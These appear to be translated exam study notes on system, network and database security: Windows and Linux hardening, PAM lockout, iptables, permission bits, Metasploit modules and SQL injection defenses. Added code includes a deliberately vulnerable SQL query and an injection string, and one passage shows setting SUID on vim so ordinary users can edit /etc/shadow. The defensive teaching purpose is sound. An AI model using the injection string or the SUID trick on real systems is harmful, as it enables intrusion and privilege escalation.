3. Network security level assessment is mainly divided into:
Technical security assessment: secure physical environment, communication network security, regional boundary security, secure computing environment, and security management center.
Management security assessment: management organization, management system, management personnel, security construction management, security operation and maintenance management.

4. The process of network security penetration testing:
commission acceptance, preparation, implementation, comprehensive assessment, and conclusion

5. Security penetration testing:
The process of network security penetration testing can be divided into five stages: commission acceptance, preparation, implementation, comprehensive evaluation and conclusion.

Classification based on the confidentiality of the assessment objects.
According to the confidentiality nature of the assessment objects, network security assessments can be divided into two types: security assessments of confidential information systems and security assessments of non-confidential information systems.

3 types of penetration testing:
Black Box:
White Box: advanced persistent threat (APT) simulation.
Gray Box: mobile banking and code security testing.

The evaluation mainly includes: security function testing, security management testing, code security review, security penetration, and information system attack testing.

19. (Key Points) Operating system security requirements mainly include:
identification and authentication,
access control,
system resource security,
network security,
anti-attack,
self-security.

System security research is divided into: basic theoretical research, applied technology research, security management research, security standard research, security strategy research, and security evaluation research.

2. Operating system security mechanisms:
hardware security,
identification and authentication,
access control,
least privilege,
security audit,
trusted path,
system security enhancement.

Analysis of Windows system security issues:
passwords, malicious code, application software vulnerabilities, system program vulnerabilities, registry security, file sharing security, physical proximity attacks

The structure of Windows XP is a mixture of a hierarchical structure and a client/server structure. Its system structure is divided into three layers.
The lowest layer is the hardware abstraction layer, which provides the upper layer with an interface to the hardware; with this layer, the system can be ported easily.
The second layer is the kernel layer, which provides execution, interrupt and exception handling, and synchronization support for the lower layer.
The third layer is a series of modules that implement basic system services.

• The file permissions of inetd.conf are set to 600;
• The file owner of inetd.conf is set to root;
• The file permissions of services are set to 644;
• The file owner of services is root;
• In inetd.conf, comment out unnecessary services, such as finger, echo, chargen, rsh, rlogin, tftp;
• Only open network communication ports related to system business operation.

3. There are two types of Windows authentication:
Local authentication: authenticates the user against the local machine or an AD domain controller.
Network authentication: authenticates the user for the specific target service to be accessed.

When a Windows user logs in to the system, the WinLogon process creates an access token for the user, which contains the security identifiers (SIDs) of the user and the groups the user belongs to, and serves as the user's identity. Objects such as files carry Discretionary Access Control Lists (DACLs), which indicate who has access, and System Access Control Lists (SACLs), which indicate which subjects' access needs to be recorded. When a user process accesses an object, it requests access services from the core through the WIN32 subsystem. The core's Security Reference Monitor (SRM) compares the access token with the object's DACL to determine whether the process has access rights to the object, and also checks the object's SACL to determine whether this access falls within the established audit scope; if so, it is sent to the audit subsystem.

4. Windows log:
System log: SysEvent.evt
Application log: AppEvent.evt
Security log: SecEvent.evt

5. How to improve the security of the Windows system:
regularly patch vulnerabilities, stop useless services and uninstall useless software, regularly upgrade and update programs, modify the configuration and permissions of the system or application software, regularly check for Trojans and viruses, and install security tools and anti-virus software.

6. System startup, account and password security enhancement:
disable the guest account, rename the administrator account and then create an account named administrator with only ordinary user rights, set complex passwords, prevent the system from displaying the last logged-in account, enable password and account security policies (the account is automatically locked for 20 minutes after three incorrect passwords, passwords are valid for 42 days, and passwords are no fewer than 6 characters long), set a BIOS password, and disable booting from CD-ROM, USB drive, PXE, etc. in the BIOS.

Windows 2000 security enhancements:
1. System startup security enhancement
2. Account and password management security enhancement
1) Disable the guest account
2) Limit the number of unnecessary users
3) Rename the system Administrator account
4) Create a trap account
5) Set secure, complex passwords
6) Set a screen saver password
7) Prevent the system from displaying the last logged-in user name
8) Enable password security policy
9) Enable account policy
3. Install the latest system patches
4. Enhance network security
1) Prohibit the establishment of null connections
2) Turn off default sharing
3) Turn off unnecessary network services and network ports
5. Install third-party protection software

7. Prevent anonymous access to the computer by setting RestrictAnonymous=2 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa

8. Adjust the firewall to prohibit external network access to ports 135-139 and 445.

9. Windows security policies include: account policy, audit policy, remote access policy, and file sharing policy.

The Windows 2000 system has a dedicated security subsystem in its security design. The security subsystem mainly consists of the Local Security Authority (LSA), the Security Accounts Manager (SAM) and the Security Reference Monitor (SRM).

The Windows 2000 security system integrates three different authentication technologies:
Kerberos V5, public key certificates, and NTLM.

Linux three layers: hardware layer, system kernel, application layer
Linux authentication: 1. Password-based authentication method 2. Terminal authentication 3. Host trust mechanism 4. Third-party authentication

The finger service can obtain remote Linux host information

10. Linux system reinforcement:
Determine the business application requirements on the Linux system.

Install only the programs the business actually needs (minimal installation), and do not install unnecessary programs.

Configure system security mechanisms: account passwords, access control, network services, system audit, etc.

Use third-party software to enhance system security, such as SELinux.

Run security self-checks: use nmap to scan ports, COPS for file configuration detection, and Crack for password detection.

Reconfigure based on the test results.

Conduct security monitoring of the system from time to time, such as: process monitoring, user monitoring, network connection monitoring, log analysis, etc.

11. Linux system security enhancement:
Regularly patch vulnerabilities.
Run with minimum privileges, and prohibit useless services and ports.
Give the inetd.conf file 600 permissions with root as the file owner, and turn off useless services.
Give the services file 644 permissions with root as the file owner.
Set a boot protection password.
Avoid weak passwords.
Disable default accounts.
Use the system's own firewall, such as iptables.
Use SSH to enhance network service security.
Use tcp_wrapper to enhance access control.
Use Tripwire or MD5Sum integrity detection tools to detect LKM backdoors.
Carry out system security monitoring.

Through LSM, relevant security organizations can develop specific security modules according to security needs and hook them into the Linux operating system. Currently, the main methods used to enhance Linux security in this way include the Pluggable Authentication Modules (PAM) framework, SELinux, etc.


PAM security
There are 4 types of content in each file under /etc/pam.d/. The content specified in the first column is the module-type. There are only 4 types in total:
auth: identifies the user, for example by prompting for a password and determining whether the user is root;
account: checks various attributes of the account, such as whether login is allowed and whether the maximum number of users has been reached;
session: defines the operations to be performed before login and after exit, such as recording login connection information, opening and closing user data, and mounting file systems;
password: uses user information to update data, such as changing user passwords.

/etc/pam.d/system-auth

auth required pam_tally2.so deny=3 unlock_time=5 even_deny_root root_unlock_time=10
(If the password is incorrect 3 times in a row, the account is locked. Ordinary users are unlocked after 5 seconds (unlock_time=5), and the root user is unlocked after 10 seconds (root_unlock_time=10).)

password requisite pam_cracklib.so try_first_pass retry=3 type= minlen=8 ucredit=-2 lcredit=-4 dcredit=-1 ocredit=-1
(The user is prompted at most 3 times for an acceptable new password; the minimum password length is 8; the password must contain at least 2 uppercase letters, at least 4 lowercase letters, at least one number, and at least one special character.)

password sufficient pam_unix.so md5 shadow nullok try_first_pass use_authtok remember=5
(The last 5 passwords used by the user cannot be reused.)

Insert image description here
Enterprise servers in real scenarios sometimes need to limit the number of logins for remote users to prevent malicious users from trying to enter different passwords multiple times and carry out credential stuffing attacks. This function can be implemented through the pam_tally2.so dynamic library of the PAM authentication module.
/etc/pam.d/sshd Add the next line:

auth required pam_tally2.so even_deny_root deny=3 unlock_time=60

even_deny_root: the lockout also applies to the superuser root.
unlock_time=60: sets the unlock time to 60 seconds. Once 60 seconds have passed without a login attempt, entering the correct password lets the user log in again.
deny=3: sets the number of denials to 3. After the wrong password has been entered deny times in a row, the login is refused even if the correct password is entered on attempt deny+1 (that is, the user is locked).
5) First log in remotely over ssh as the superuser root and enter the wrong password 3 times. Even if the correct password is entered on the fourth attempt, the login is still refused (the root user is locked), which shows that the even_deny_root parameter has taken effect. Only after the command pam_tally2 --user root --reset has been executed to reset the number of failed logins to 0 (the root user is unlocked) can the user log in again with the correct password.
6) Run the login test with the ordinary user redhat. Once the number of denials set by deny=3 has been exceeded, the user cannot log in even with the correct password (the redhat user is locked). Only after the command pam_tally2 --user redhat --reset has been executed to reset the number of failed logins to 0 (the redhat user is unlocked) can the user log in again with the correct password.
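The lockout options above can be checked mechanically. The following is an added example, not part of the original notes: a small auditor for the auth stack of a PAM file. The sample files, the finding codes and the max_deny threshold are assumptions of this example; the ordering check reflects that a "sufficient" module placed before pam_tally2 ends the stack on a correct password before the lock is evaluated.

```python
import re

# Constructed samples, not taken from a real host.
GOOD_SSHD = """\
#%PAM-1.0
auth       required     pam_tally2.so even_deny_root deny=3 unlock_time=60
auth       include      password-auth
account    required     pam_nologin.so
"""
WEAK_SSHD = """\
auth       sufficient   pam_unix.so nullok try_first_pass
auth       required     pam_tally2.so deny=10
"""

# type, control (one word or a [bracketed list]), module, remaining arguments
PAM_LINE = re.compile(r"^(-?\w+)\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$")

EXPLANATIONS = {  # finding codes are names chosen for this example
    "NO_TALLY": "no pam_tally2.so line in the auth stack",
    "NO_DENY": "deny= is missing, so failures are counted but never locked",
    "DENY_TOO_HIGH": "deny= is above the policy threshold",
    "MANUAL_UNLOCK_ONLY": "no unlock_time=, only pam_tally2 --reset unlocks",
    "ROOT_EXEMPT": "even_deny_root is missing, root is never locked",
    "TALLY_AFTER_SUFFICIENT": "a 'sufficient' module runs before pam_tally2",
}


def parse_pam(text):
    """Return [(type, control, module, {option: value})] for each rule line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        m = PAM_LINE.match(line)
        if not m:
            continue
        ptype, control, module, rest = m.groups()
        opts = {}
        for arg in rest.split():
            key, sep, value = arg.partition("=")
            opts[key] = value if sep else True   # bare flags map to True
        entries.append((ptype.lstrip("-"), control, module, opts))
    return entries


def audit_lockout(text, max_deny=5):
    """Return the set of finding codes for the auth stack in `text`.

    max_deny is this example's policy threshold, not a PAM default.
    """
    auth = [e for e in parse_pam(text) if e[0] == "auth"]
    pos = next((i for i, e in enumerate(auth) if e[2] == "pam_tally2.so"), None)
    if pos is None:
        return {"NO_TALLY"}
    findings = set()
    opts = auth[pos][3]
    deny = opts.get("deny")
    if not (isinstance(deny, str) and deny.isdigit() and int(deny) > 0):
        findings.add("NO_DENY")
    elif int(deny) > max_deny:
        findings.add("DENY_TOO_HIGH")
    if "unlock_time" not in opts:
        findings.add("MANUAL_UNLOCK_ONLY")
    if "even_deny_root" not in opts:
        findings.add("ROOT_EXEMPT")
    if any(e[1] == "sufficient" for e in auth[:pos]):
        findings.add("TALLY_AFTER_SUFFICIENT")
    return findings


if __name__ == "__main__":
    for name, text in (("good", GOOD_SSHD), ("weak", WEAK_SSHD)):
        for code in sorted(audit_lockout(text)) or ["OK"]:
            print(name, code, EXPLANATIONS.get(code, ""))
```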

SELinux implements mandatory access control on Linux systems by setting labels and security policy rules.

SELinux mainly involves two settings, modes and policies:
The modes are: enforcing, permissive, and disabled.
Check the current mode with getenforce; change it with setenforce 0 or 1 (1 is enforcing mode, 0 is permissive mode).

The policies are: targeted, minimum, and mls.
Use sestatus to view the current policy.

targeted
The default policy type, which uses an MCS-level security policy. System processes are divided into two categories. One category runs in confined domains, where every access request is restricted by SELinux; these processes are called targets. The other category runs in the unconfined domain and is not restricted by SELinux. All processes located in a confined domain are subject to SELinux restrictions.

minimum
A subset of targeted: only processes in the specified confined domains are subject to SELinux restrictions.

mls
SELinux adopts the targeted policy by default. Targeted processes run in confined domains, and untargeted processes run in the unconfined domain.
In the MLS policy, all processes are divided into fine-grained security domains, which are restricted by the MLS policy. If the mls policy also adopts the Bell-LaPadula model, all processes are further restricted by the security level of the data.

Linux login prompt message
/etc/issue
\r operating system version
\m hardware level
\s operating system name

Switch for the prompt message shown after an ssh remote connection
/etc/ssh/sshd_config
Banner none

Linux password size, length, etc. are set in this file: cat /etc/login.defs

iptables has four tables and five chains:
1. The "four tables" are the functions of iptables
- filter table (filtering rule table): controls whether data packets are allowed in, out, and to be forwarded
- nat table (address translation rule table): controls address translation of data packets
- mangle table (packet marking rule table): modifies the original data in the packet
- raw table (connection tracking rule table): controls whether the connection tracking mechanism in the nat table is enabled

2. The "five chains" are the five rule chains defined by Netfilter in the kernel to control the network. Each rule table contains several chains, and firewall rules are written into these specific chains.
- INPUT (inbound data filtering): processes data coming from outside
- OUTPUT (outbound data filtering): processes data being sent out
- FORWARD (forwarding data filtering): forwards the data to other network interfaces of the machine
- PREROUTING (pre-routing filtering): processes packets that have just arrived at the machine, before they are routed. It rewrites the destination IP address in the packet and is usually used for DNAT (destination NAT).
- POSTROUTING (post-routing filtering): processes packets that are about to leave the machine. It rewrites the source IP address in the packet and is commonly used for SNAT (source NAT).

iptables rule syntax:
iptables -t table name <-A/I/D/R> rule chain name [rule number] <-i/o network card name> -p protocol name <-s source IP/source subnet> --sport source port <-d destination IP/destination subnet> --dport destination port -j action

First, the meaning of dport and sport:
dport: destination port
sport: source port
These two are easy to confuse when learning iptables for the first time, so here is an explanation in plain language.
The literal meaning of dport and sport is easy to understand: one is the port the data is going to, and the other is the port the data comes from.
In use, however, they must be read according to the direction in which the packet flows (INPUT or OUTPUT).
For example: /sbin/iptables -A INPUT -p tcp --dport 80 -j ACCEPT
Note the INPUT parameter. It means the rule applies to packets entering the machine.
The packet can then be described as follows:
1. This is data entering the local server from the outside.
2. The destination port (dport) of the packet is 80, which means it wants to access local port 80.
3. Allow the above traffic to pass.
Summary: allow external data to access port 80 of the local server.

Look at the second example: /sbin/iptables -A INPUT -p tcp --sport 80 -j ACCEPT
1. This is data entering the local server from the outside.
2. The source port (sport) of the packet is 80, which means the other party sent the packet from its port 80.
3. Allow the above traffic to pass.
Summary: allow external data sent from port 80 to access the local server.
Summary for INPUT: dport refers to the local side, and sport refers to the external side.

If the packet is outgoing (OUTPUT), it is read the other way round.
For example:
/sbin/iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT
1. This is data going out from the local machine.
2. The outgoing destination port (dport) is 80.
3. Allow the above traffic to pass.
Summary for OUTPUT: dport refers to the external side, and sport refers to the local side.

iptables -nvL
View all rules

iptables -nvL --line-number
View rules with line numbers

iptables -R INPUT 3 -j ACCEPT
Modify the third rule

iptables -F
iptables -X
iptables -Z
Clear the rules

iptables -A INPUT -j REJECT
Appended at the end by default; rejects everything

iptables -I INPUT -p tcp --dport 22 -j ACCEPT
Allows port 22

iptables -I INPUT -s 192.168.1.5 -j DROP
Inserted at the front; denies all communication from this IP. If no line number is given, the rule goes to line 1 by default.

iptables -I INPUT 3 -s 192.168.1.3 -j DROP
Inserts a rule at line 3

iptables -D INPUT -s 192.168.1.5 -j DROP
Deletes this rule

Directly reject ICMP request packets:
sudo iptables -A INPUT -p icmp --icmp-type echo-request -j REJECT
If you try to ping this host at this point,
"Reply from 192.168.50.131: Destination port unreachable" will appear.
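Rule order and the sport/dport distinction are easier to see when a chain is evaluated packet by packet. The following is an added example, not part of the original notes: a minimal first-match model of the INPUT chain that replays the -A/-I/-D commands listed above. The server address 192.168.1.10, the client addresses and the class names are constructed for this example; real iptables supports many more match options.

```python
from dataclasses import dataclass
from typing import Optional

SERVER = "192.168.1.10"   # constructed address of the local machine


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int


@dataclass(frozen=True)
class Rule:
    target: str                    # -j ACCEPT / DROP / REJECT
    proto: Optional[str] = None    # -p
    src: Optional[str] = None      # -s (single address only in this model)
    sport: Optional[int] = None    # --sport
    dport: Optional[int] = None    # --dport

    def matches(self, pkt):
        # An option that was not given matches every packet.
        return all(want is None or want == got for want, got in (
            (self.proto, pkt.proto), (self.src, pkt.src),
            (self.sport, pkt.sport), (self.dport, pkt.dport)))


class Chain:
    def __init__(self, policy="ACCEPT"):
        self.policy, self.rules = policy, []

    def append(self, rule):            # iptables -A
        self.rules.append(rule)

    def insert(self, rule, num=1):     # iptables -I [num], default line 1
        self.rules.insert(num - 1, rule)

    def replace(self, num, rule):      # iptables -R num
        self.rules[num - 1] = rule

    def delete(self, rule):            # iptables -D with a rule specification
        self.rules.remove(rule)

    def verdict(self, pkt):
        """The first matching rule decides: (target, rule number or None)."""
        for num, rule in enumerate(self.rules, start=1):
            if rule.matches(pkt):
                return rule.target, num
        return self.policy, None


def inbound(src, sport, dport, proto="tcp"):
    return Packet(proto, src, sport, SERVER, dport)


def build_input_chain():
    chain = Chain()
    chain.append(Rule("REJECT"))                          # -A INPUT -j REJECT
    chain.insert(Rule("ACCEPT", proto="tcp", dport=22))   # -I INPUT -p tcp --dport 22 -j ACCEPT
    chain.insert(Rule("DROP", src="192.168.1.5"))         # -I INPUT -s 192.168.1.5 -j DROP
    chain.insert(Rule("DROP", src="192.168.1.3"), 3)      # -I INPUT 3 -s 192.168.1.3 -j DROP
    return chain


def direction_demo():
    """On INPUT, dport is the local port and sport is the remote port."""
    by_dport = Rule("ACCEPT", proto="tcp", dport=80)      # -A INPUT --dport 80
    by_sport = Rule("ACCEPT", proto="tcp", sport=80)      # -A INPUT --sport 80
    request = inbound("203.0.113.7", 51000, 80)           # client -> local web server
    reply = inbound("203.0.113.7", 80, 51000)             # remote web server -> local client
    return {
        "request_matches_dport": by_dport.matches(request),
        "request_matches_sport": by_sport.matches(request),
        "reply_matches_sport": by_sport.matches(reply),
        "reply_matches_dport": by_dport.matches(reply),
        # The sender picks its own source port, so the --sport rule also
        # admits a packet addressed to local port 22.
        "sport80_to_port22_matches_sport": by_sport.matches(inbound("203.0.113.7", 80, 22)),
    }


if __name__ == "__main__":
    chain = build_input_chain()
    for src, dport in (("192.168.1.20", 22), ("192.168.1.5", 22),
                       ("192.168.1.3", 22), ("192.168.1.3", 80), ("192.168.1.20", 80)):
        print(src, dport, chain.verdict(inbound(src, 50000, dport)))
    print(direction_demo())
```

Note the third case: the DROP for 192.168.1.3 sits on line 3, after the port 22 ACCEPT, so SSH from that address is still accepted.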

Log daemon: /etc/rsyslog.conf
btmp records failed logins; use the lastb command to view it

Linux user IDs: 0 is the superuser, 1-99 are system management users, and more than 500 are ordinary users

/etc/passwd 644
/etc/shadow 400

/etc/passwd file
username:password:UID:GID:user description:user home directory:user shell

/etc/shadow file
username:password:last password change time:password change interval:password validity period:days of warning before password expiration:grace days after password expiration:account expiration time:reserved

/etc/group file
group name:group password:group ID:group members

/etc/gshadow file
group name:group password:group administrator:group members

When setting SUID, SGID, or SBIT, the corresponding x (execute) permission must already be present. Otherwise the special bit is useless even if it is set, and it is displayed in uppercase (S/T). If x is present first and the special bit is then set, it is displayed in lowercase (s/t) and takes effect.

1. -rwsr-xr-x indicates that SUID and the executable bit in the owner permissions are both set

2. -rwSr--r-- indicates that SUID is set, but the executable bit in the owner permissions is not set (x permission was not given beforehand)

3. -rwxr-sr-x indicates that SGID and the executable bit in the group permissions are both set

4. -rw-r-Sr-- indicates that SGID is set, but the executable bit in the group permissions is not set

For example, the value of -rwsr-xr-x above is:
1 0 0 1 1 1 1 0 1 1 0 1. Converting each group of three bits into a digit gives 4755

The value of -rw-r-Sr-- is:
0 1 0 1 1 0 1 0 0 1 0 0. Converting each group of three bits into a digit gives 2644

suid
Only used for files.

sbit
For directories: only the creator can delete files in the directory.
Example: chmod o+t

sgid
For a directory or a file; for a directory, its contents inherit the group of the parent directory.
Example: chmod g+s

SUID is set on a file: it allows other users who have no permission on the file to use this file to perform operations with root-like permissions.
For example: if SUID permission is added to vim, ordinary users can also run vim /etc/shadow to modify the file.
chmod u+s /usr/bin/vim

SGID
Can act on both directories and executable files.
As long as the parent directory has SGID permission, all subdirectories inherit it recursively.
The executor needs x permission on the executable file.
During execution, the caller temporarily obtains the permissions of the group the file belongs to.

When t appears in the x position of the permissions for others, SBIT is set.
SBIT (Sticky Bit) is currently only valid for directories. Its effect on a directory is: when a user creates a file or directory inside it, only that user and root have the authority to delete it.
The most representative example is the /tmp directory. Anyone can add or modify files in /tmp (because the permissions are all rwx), but only the creator of a file or directory and root can delete it.

Find which files use suid:
find /usr/bin/vim -perm 4755

Umask (the value of umask can be modified in the /etc/profile and /etc/bashrc scripts):
The permission of a new folder created by the root user is 755, because the umask of root is 022, so the default is 777-022, which is 755.
The permission of a new file created by root is 644, because the umask of root is 022, so the default is 666-022, which is 644.

The permission of a new folder created by an ordinary user is 775, because the umask of ordinary users is 002, so the default is 777-002, which is 775.
The permission of a new file created by an ordinary user is 664, because the umask of ordinary users is 002, so the default is 666-002, which is 664.
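The special-bit notation and the umask arithmetic above can both be verified in a few lines. The following is an added example, not part of the original notes: it converts an ls-style permission string to its octal value, reports special bits that are set without the matching x bit, and computes default modes. It goes one step beyond the text by showing that the kernel applies base AND NOT umask, which only coincides with the subtraction shortcut for umasks such as 022 and 002. The function names are this example's own.

```python
import stat

# (special bit, lowercase marker, uppercase marker) for owner, group, others
_SPECIAL = ((stat.S_ISUID, "s", "S"), (stat.S_ISGID, "s", "S"), (stat.S_ISVTX, "t", "T"))


def mode_from_string(perm):
    """Convert an ls-style string such as '-rwsr-xr-x' to its mode (0o4755)."""
    if len(perm) != 10:
        raise ValueError("expected 10 characters, e.g. '-rwsr-xr-x'")
    mode = 0
    for i, (special, lower, upper) in enumerate(_SPECIAL):
        r, w, x = perm[1 + 3 * i: 4 + 3 * i]
        if r not in "r-" or w not in "w-" or x not in "x-" + lower + upper:
            raise ValueError("bad permission triple: " + r + w + x)
        shift = 6 - 3 * i
        if r == "r":
            mode |= 4 << shift
        if w == "w":
            mode |= 2 << shift
        if x in ("x", lower):        # lowercase s/t: the execute bit is set too
            mode |= 1 << shift
        if x in (lower, upper):      # s/S or t/T: the special bit is set
            mode |= special
    return mode


def ineffective_special_bits(perm):
    """Names of special bits shown in uppercase (set, but x is missing)."""
    names = ("SUID", "SGID", "SBIT")
    return [names[i] for i in range(3) if perm[3 + 3 * i] in "ST"]


def default_mode(umask, is_dir):
    """Mode of a newly created file or directory: base AND NOT umask."""
    base = 0o777 if is_dir else 0o666
    return base & ~umask


def subtraction_shortcut(umask, is_dir):
    """The 777-umask / 666-umask rule of thumb used in the notes above."""
    base = 0o777 if is_dir else 0o666
    return base - umask


if __name__ == "__main__":
    for perm in ("-rwsr-xr-x", "-rwSr--r--", "-rwxr-sr-x", "-rw-r-Sr--", "drwxrwxrwt"):
        print(perm, oct(mode_from_string(perm)), ineffective_special_bits(perm))
    for umask in (0o022, 0o002, 0o033):
        print(oct(umask),
              "dir", oct(default_mode(umask, True)),
              "file", oct(default_mode(umask, False)),
              "shortcut for file", oct(subtraction_shortcut(umask, False)))
```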

12. Domestic operating systems should be independent and controllable, safe and trustworthy, and should enhance the security of the open source Linux operating system.
There must be a separation of three powers: configuration rights, authorization rights, and audit rights.

The main security risks faced by domestic operating systems are:

1. Security risks of the Linux kernel
2. Security of self-developed system components
3. Security of third-party system components that are relied on
4. Security of the system security configuration
5. Security of the hardware

Security enhancement measures for domestic operating systems:
Domestic operating systems enhance the security of the open source Linux operating system in terms of autonomy, controllability, security and trustworthiness, and provide security guarantees for Linux from many aspects, including separation of administrator privileges, least privilege, and a combination of role-based and type-based access control, fine-grained discretionary access control, and multi-level security (i.e. prohibiting reading up and writing down), giving comprehensive protection from the kernel to applications.

Metasploit module introduction
Metasploit is a penetration testing framework. Its modules:
auxiliary: auxiliary module that assists penetration (port scanning, login password brute forcing, vulnerability verification, etc.)
exploits (exp): vulnerability exploitation module, containing exploit scripts for mainstream vulnerabilities, usually used against targets that may be vulnerable.
Naming rules: operating system/application protocol category
payloads: attack payload, mainly the code executed on the target machine after a successful attack, such as reverse shell code
post: post-penetration module; after a vulnerability has been exploited and a meterpreter obtained, it sends functional instructions to the target, such as privilege escalation.
encoders: encoder module, containing various encoding tools that encode and encrypt the payload in order to bypass intrusion detection and filtering systems.
evasion: evasion module, used to generate antivirus-evading payloads
nops: IDS/IPS check packets for irregular data, so in some cases, such as overflow attacks, certain special sled strings (NOPs, \x90\x90) are intercepted and cause the attack to fail.

20 (Key points). There are two methods of database storage encryption: encryption inside the database and encryption outside the database.

Database security threats: misuse of authorization, logical inference and aggregation, masquerading, bypassing controls, covert channels, SQL injection attacks, database password cracking, hardware and media attacks

Database security requirements:
database identification and authentication,
database access control,
database security audit,
database backup and recovery,
database encryption,
resource restriction (to avoid denial of service attacks on the database system),
database security hardening,
database security management

Database security implementation technology:
database encryption,
database firewall,
database desensitization,
database vulnerability scanning


1. The database firewall works by analyzing the SQL protocol.

2. Database firewall function:
It detects users' SQL injection and overflow attacks against the database in real time, raises alarms and records logs, applies virtual patches to protect vulnerable databases, and limits the number of database rows affected by update and delete operations.

The security functions of a database firewall:
(1) Block direct access to the database.
(2) Enhanced authentication.
(3) Attack detection.
(4) Prevent vulnerability exploitation.
(5) Prevent internal high-risk operations.
(6) Prevent sensitive data leakage.
(7) Database security audit.

3. Database desensitization: transform the data in the database so that the data is not leaked to unauthorized users.
Desensitization technical methods: shielding, transformation, replacement, randomization, encryption.

There are three commonly used encryption technologies and methods in databases: file-based, field-based, and record-based.

Database encryption refers to encrypting the data stored in or transmitted to and from the database, so that it is stored or transmitted as ciphertext, to prevent data leakage and protect sensitive data.
Database encryption methods are mainly divided into two types:
one covers the data exchanged with the database over the network, which is usually implemented using the SSL protocol;
the other covers the data stored in the database, which is implemented through database storage encryption. According to the relationship between the encryption component and the database management system, database storage encryption can be divided into two methods: encryption inside the database and encryption outside the database. Encryption inside the database means that the encryption module is implemented inside the DBMS.

4. Oracle database has an audit function, with three types of audit activities: login attempts, database activities, and object access. Oracle provides transparent data encryption (using different keys to encrypt different data) and data shielding mechanisms to protect data security.

• The Oracle internal password is stored in the strXXX.cmd file, where XXX is the Oracle system ID (SID); the default is "ORCL". This password is used for the database startup process and provides full access to database resources. Permissions must be set on this file in Windows NT.
• The Oracle listener process password is saved in the file "listener.ora" (which stores all Oracle execution passwords) and is used to start and stop the Oracle listener process. A strong password must be set in place of the default one, and access permissions must be set on the file. Intruders can use this weakness to conduct DoS attacks.
• Oracle "orapw" file permission control: Oracle internal passwords and the passwords of accounts allowed the SYSDBA role are saved in the "orapw" text file, and access permissions to this file should be restricted. Even though it is encrypted, it can still be brute-forced by intruders.

5. The published vulnerabilities of the MS SQL Server database include: denial of service, code execution, overflow, and privilege acquisition.

The system database is a set of databases created and provided internally by SQL Server. There are four main databases among them. They are Master, Msdb, Model and Tempdb respectively.
Master database: used to record all SQL Server system-level information, which is used to control user databases and data operations.

Msdb database: used by Enterprise Manager and Agent, recording task planning information, event processing information, data backup and recovery information, warning and exception information.

Model database: SQL Server provides a template for user databases. New user databases are based on the model database. Each time a new database is created, SQL Server first makes a copy of the model database and then expands the copy to the required size.

tempdb database: a shared workspace that can be used by all databases in SQL Server. It provides a storage area for temporary tables and other temporary work.

MS SQL security analysis
User authentication
Access control
Database encryption
Backup and recovery mechanism
Security audit

SQL injection attack process
SQL injection attack: the attacker inserts SQL commands into the input field of a Web form or the query string of a page request, and deceives the server into executing malicious SQL commands.

Defense measures against SQL injection attacks
Strictly distinguish the permissions of ordinary users from those of system administrator users.
Force the use of parameterized statements.
Strengthen validation of user input.
Mask error messages.
Encrypt sensitive data.
Set minimal permissions on directories.
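Three of the defenses listed above (parameterized statements, input validation, masked error messages) can be shown side by side with the concatenated query they replace. The following is an added example, not part of the original notes, using Python's built-in sqlite3 module with an in-memory database; the table, the rows, the test inputs and the username allow-list are constructed for this example.

```python
import re
import sqlite3

# Assumed allow-list for user names in this example.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")

# Constructed input that changes the meaning of a concatenated query.
INJECTED = "nobody' OR '1'='1"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "admin"), ("bob", "user")])
    return db


def lookup_vulnerable(db, name):
    # DELIBERATELY VULNERABLE: the input becomes part of the SQL text, so a
    # quote in `name` ends the string literal and the rest is parsed as SQL.
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, name):
    # The statement text is fixed; `name` is bound as a value and is never
    # parsed as SQL, whatever characters it contains.
    return db.execute("SELECT name, role FROM users WHERE name = ?",
                      (name,)).fetchall()


def raw_error(db, name):
    """What an unmasked error from the vulnerable query would show a client."""
    try:
        lookup_vulnerable(db, name)
    except sqlite3.Error as exc:
        return str(exc)          # leaks parser details about the statement
    return None


def safe_lookup(db, name):
    """Validation + parameterized statement + masked errors: (status, rows)."""
    if not USERNAME_RE.fullmatch(name):
        return "invalid input", []
    try:
        return "ok", lookup_parameterized(db, name)
    except sqlite3.Error:
        # Details belong in the server log; the client sees a generic message.
        return "internal error", []


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", lookup_vulnerable(db, INJECTED))     # every row
    print("parameterized:", lookup_parameterized(db, INJECTED))  # no row
    print("raw error    :", raw_error(db, "bob'"))
    print("safe lookup  :", safe_lookup(db, INJECTED), safe_lookup(db, "bob"))
```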

6. SQL Server uses role access control. There are three roles: fixed server role, fixed database role, and database application role. Each role has different permissions.

7. SQL Server has 4 backup solutions: file and file group backup, transaction log backup, full backup, and differential backup.
There are three recovery models: simple recovery, logging recovery, and full recovery.

8. The main vulnerabilities of the MySQL database are: denial of service, overflow, code execution, evasion, and privilege acquisition.

SQL server has service master key, database master key, database key

9. MySQL has 5 authorization tables: user, db, host, tables_priv, columns_priv.

10. Only administrative users of MySQL can use the grant and revoke commands to create users, authorize and revoke rights, delete users and other high-risk operations.

The databases that come with version 5.6 are: information_schema, mysql, performance_schema, and test.

information_schema
Stores information about all databases in the MySQL service: how many databases the MySQL service has, which tables are in each database, the data types of the fields in each table, the indexes of each table, and the permissions required to access each database.

mysql
Stores MySQL's permissions, parameters, objects and status information, for example which users can access this data, DB parameters, plug-ins, and master-slave settings.

performance_schema
Mainly used to collect database server performance parameters: it provides detailed information about process waits, including locks, mutexes, and file information; it saves historical event summary information so that MySQL server performance can be judged in detail; monitoring event points are easy to add and remove, and the monitoring cycle of the MySQL server can be changed at will, for example (CYCLE, MICROSECOND).

test
Contains nothing.

Microsoft has established the Microsoft Security Response Center (MSRC). MSRC releases security bulletins monthly to address security vulnerabilities, and publishes a vulnerability exploitability index, which is divided into four levels:
0 - detected being exploited, 1 - likely to be exploited, 2 - unlikely to be exploited, and 3 - cannot be exploited.

"Dasher.B" worm. The worm can target Microsoft MS04-045 and MS04-039 vulnerabilities or use SQL
overflow tools to attack.

